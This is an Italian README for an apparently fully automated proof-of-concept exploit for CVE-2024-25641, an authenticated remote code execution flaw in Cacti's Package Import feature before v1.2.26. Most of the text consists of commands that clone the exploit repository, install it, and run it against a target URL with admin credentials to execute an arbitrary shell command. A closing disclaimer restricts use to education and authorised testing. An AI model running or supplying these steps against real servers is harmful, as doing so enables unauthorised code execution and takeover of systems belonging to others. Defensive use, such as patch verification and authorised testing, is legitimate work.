
PoC completamente automatizzato - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵
RCE autenticatoVersione di Cacti < v1.2.26Una vulnerabilità di scrittura arbitraria di file, sfruttabile tramite la funzionalità "Package Import", consente agli utenti autenticati con il permesso "Import Templates" di eseguire codice PHP arbitrario sul server web (RCE).

git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
pip install -r requirements.txt
python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
poetry install
poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
Questo strumento è destinato esclusivamente a scopi educativi e di test. L'autore di questo strumento non è responsabile per eventuali usi impropri o attività illegali compiute con esso. Utilizza questo strumento solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. L'accesso non autorizzato a sistemi informatici è illegale e non etico.